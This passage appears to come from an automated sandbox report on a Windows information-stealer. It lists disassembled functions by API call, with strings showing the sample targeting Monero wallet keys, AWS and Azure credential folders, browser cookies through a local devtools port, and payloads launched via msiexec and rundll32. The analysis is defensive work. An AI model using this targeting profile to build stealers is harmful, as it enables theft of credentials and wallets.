                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 9c88d554a378f0b2cf9545ba2feb6746574aaba643d9ac460de49aeebd69806b
                          • Instruction ID: 00e017218d2b73ad44460063fce94910a6e9613465bfccaef21fb4ab7f8bea53
                          • Opcode Fuzzy Hash: 9c88d554a378f0b2cf9545ba2feb6746574aaba643d9ac460de49aeebd69806b
                          • Instruction Fuzzy Hash: D512F371A20118ABCB16EBA0DCA5FEEB37DBF15700F0045A9F14A66093DF706A49CF65
                          Function 0002CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D083
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002D1C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002D1CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D308
                          • lstrcat.KERNEL32(?,00041570), ref: 0002D317
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D32A
                          • lstrcat.KERNEL32(?,00041574), ref: 0002D339
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D34C
                          • lstrcat.KERNEL32(?,00041578), ref: 0002D35B
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D36E
                          • lstrcat.KERNEL32(?,0004157C), ref: 0002D37D
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D390
                          • lstrcat.KERNEL32(?,00041580), ref: 0002D39F
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D3B2
                          • lstrcat.KERNEL32(?,00041584), ref: 0002D3C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D3D4
                          • lstrcat.KERNEL32(?,00041588), ref: 0002D3E3
                            • Part of subcall function 0003AB30: lstrlen.KERNEL32(00024F55,?,?,00024F55,00040DDF), ref: 0003AB3B
                            • Part of subcall function 0003AB30: lstrcpy.KERNEL32(00040DDF,00000000), ref: 0003AB95
                          • lstrlen.KERNEL32(?), ref: 0002D42A
                          • lstrlen.KERNEL32(?), ref: 0002D439
                            • Part of subcall function 0003AD80: StrCmpCA.SHLWAPI(00000000,00041568,0002D2A2,00041568,00000000), ref: 0003AD9F
                          • DeleteFileA.KERNEL32(00000000), ref: 0002D4B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: d6ab533ca6baa1a56674cf8c7849a94695da9bfc02944b213453497d50a605cc
                          • Instruction ID: e9844746a4d9bd415d16b305b4f6417ab4713bc6392bc83b7c26ad7b565c997e
                          • Opcode Fuzzy Hash: d6ab533ca6baa1a56674cf8c7849a94695da9bfc02944b213453497d50a605cc
                          • Instruction Fuzzy Hash: AFE15671A10108ABCB05EBA0ED6AEEE737DAF15301F104569F547760A3DF31AE48CB66
                          Function 0002CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FDD0C8,00000000,?,00041544,00000000,?,?), ref: 0002CB6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0002CB89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0002CB95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0002CBA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0002CBD9
                          • StrStrA.SHLWAPI(?,00FDCFA8,00040B56), ref: 0002CBF7
                          • StrStrA.SHLWAPI(00000000,00FDCFC0), ref: 0002CC1E
                          • StrStrA.SHLWAPI(?,00FDD8A0,00000000,?,00041550,00000000,?,00000000,00000000,?,00FD8FA8,00000000,?,0004154C,00000000,?), ref: 0002CDA2
                          • StrStrA.SHLWAPI(00000000,00FDD920), ref: 0002CDB9
                            • Part of subcall function 0002C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0002C971
                            • Part of subcall function 0002C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0002C97C
                          • StrStrA.SHLWAPI(?,00FDD920,00000000,?,00041554,00000000,?,00000000,00FD9088), ref: 0002CE5A
                          • StrStrA.SHLWAPI(00000000,00FD92A8), ref: 0002CE71
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B47), ref: 0002CA43
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B4B), ref: 0002CA57
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B4E), ref: 0002CA78
                          • lstrlen.KERNEL32(00000000), ref: 0002CF44
                          • CloseHandle.KERNEL32(00000000), ref: 0002CF9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: aeb999a6d1fa11b0818241e99a9fd8610ad507fdbdd988e3615496e9dc12562d
                          • Instruction ID: 77aa56bf9fcf5e4254f0791e1627e4a309b9a71bf942aa145b5192b335932d8e
                          • Opcode Fuzzy Hash: aeb999a6d1fa11b0818241e99a9fd8610ad507fdbdd988e3615496e9dc12562d
                          • Instruction Fuzzy Hash: 0AE1F071A10108ABCB16EBA4DCA6FEEB77DAF55300F0041A9F14667193EF306A49CF65
                          Function 000384B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • RegOpenKeyExA.ADVAPI32(00000000,00FDB0C8,00000000,00020019,00000000,000405BE), ref: 00038534
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000385B6
                          • wsprintfA.USER32 ref: 000385E9
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0003860B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0003861C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038629
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s
                          • API String ID: 3246050789-1643714437
                          • Opcode ID: f9a421dba320ef2feb554cc327bbcd8ddb79e187221c634cf56f69aac9cbf5ae
                          • Instruction ID: e351076c88fe42db0274b040a27de49722d82ee38f11fcc0716ab1425ebecfd7
                          • Opcode Fuzzy Hash: f9a421dba320ef2feb554cc327bbcd8ddb79e187221c634cf56f69aac9cbf5ae
                          • Instruction Fuzzy Hash: 1C811B71A142189BDB25DB54DD95FEAB7BDBB48310F1082D8F249A6141DF70AB84CFA0
                          Function 00034FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 00035000
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0003501D
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034B7C
                            • Part of subcall function 00034B60: FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                          • lstrcat.KERNEL32(?,00000000), ref: 0003508C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 000350A9
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                            • Part of subcall function 00034B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                            • Part of subcall function 00034B60: FindClose.KERNEL32(000000FF), ref: 00034DE2
                          • lstrcat.KERNEL32(?,00000000), ref: 00035118
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00035135
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034C00
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,000408D3), ref: 00034C15
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034C32
                            • Part of subcall function 00034B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00034C6E
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00FDEAE8), ref: 00034C9A
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00040FE0), ref: 00034CAC
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,?), ref: 00034CC0
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00040FE4), ref: 00034CD2
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,?), ref: 00034CE6
                            • Part of subcall function 00034B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00034CFC
                            • Part of subcall function 00034B60: DeleteFileA.KERNEL32(?), ref: 00034D81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: b9576c160bb96a8f8929d0aa1934ae06bbf75dc24e6b16550c86a8a624c2f17a
                          • Instruction ID: af5c5d5910e28bd3467daef9dc01b6a654c0a9c1c1776d0192e8eddc6255a0de
                          • Opcode Fuzzy Hash: b9576c160bb96a8f8929d0aa1934ae06bbf75dc24e6b16550c86a8a624c2f17a
                          • Instruction Fuzzy Hash: 0941A2BAA4021867DB10E760EC57FED772C5B64704F0045A4B6896A0C2EEF4A7D8CB92
                          Function 000391A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000391FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: f51bcc36992a3d2a88ec235ae35ae928130766af83cf5fa085c5e7426ea6ce4b
                          • Instruction ID: e81190c0c432566f7b89d6450d72ab22ce78793a3b0db2972e866efcab29d209
                          • Opcode Fuzzy Hash: f51bcc36992a3d2a88ec235ae35ae928130766af83cf5fa085c5e7426ea6ce4b
                          • Instruction Fuzzy Hash: 6471FCB1A10208EBDB14DFE4EC89FEEB7B9BF48750F108558F516A7290DB74A904CB60
                          Function 00033080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00033415
                          • ShellExecuteEx.SHELL32(0000003C), ref: 000335AD
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0003373A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: db97b30517017b7087abc4732b710abc2b756ba8814852df21f3cad4ca781e24
                          • Instruction ID: d236b74ca0e041ff4a4fa5c25bdd03dea07b38093f4ec5a2a60b1f53ae69b051
                          • Opcode Fuzzy Hash: db97b30517017b7087abc4732b710abc2b756ba8814852df21f3cad4ca781e24
                          • Instruction Fuzzy Hash: 1712FF71A101189ACB16EBA0DDA2FEEB73DAF15300F0045A9F54676193EF346B49CF62
                          Function 00029BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00029A50: InternetOpenA.WININET(00040AF6,00000001,00000000,00000000,00000000), ref: 00029A6A
                          • lstrcat.KERNEL32(?,cookies), ref: 00029CAF
                          • lstrcat.KERNEL32(?,000412C4), ref: 00029CC1
                          • lstrcat.KERNEL32(?,?), ref: 00029CD5
                          • lstrcat.KERNEL32(?,000412C8), ref: 00029CE7
                          • lstrcat.KERNEL32(?,?), ref: 00029CFB
                          • lstrcat.KERNEL32(?,.txt), ref: 00029D0D
                          • lstrlen.KERNEL32(00000000), ref: 00029D17
                          • lstrlen.KERNEL32(00000000), ref: 00029D26
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 3174675846-3542011879
                          • Opcode ID: ca5aaaf8791ef96a0b9ba00b1d34ac87bca1f84bd2c49a7fc8a0b7c80eba16c1
                          • Instruction ID: 8b1a63e8070e5ba17c446914b2e02966077022f363c507f642ce08a6de5ff933
                          • Opcode Fuzzy Hash: ca5aaaf8791ef96a0b9ba00b1d34ac87bca1f84bd2c49a7fc8a0b7c80eba16c1
                          • Instruction Fuzzy Hash: B45151B2D10518ABDB14EBE0EC95FEE7738AF14301F408568F609A7091EF74AA59CF61
                          Function 00035510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 000262D0: InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                            • Part of subcall function 000262D0: StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                            • Part of subcall function 000262D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                            • Part of subcall function 000262D0: HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                            • Part of subcall function 000262D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                            • Part of subcall function 000262D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
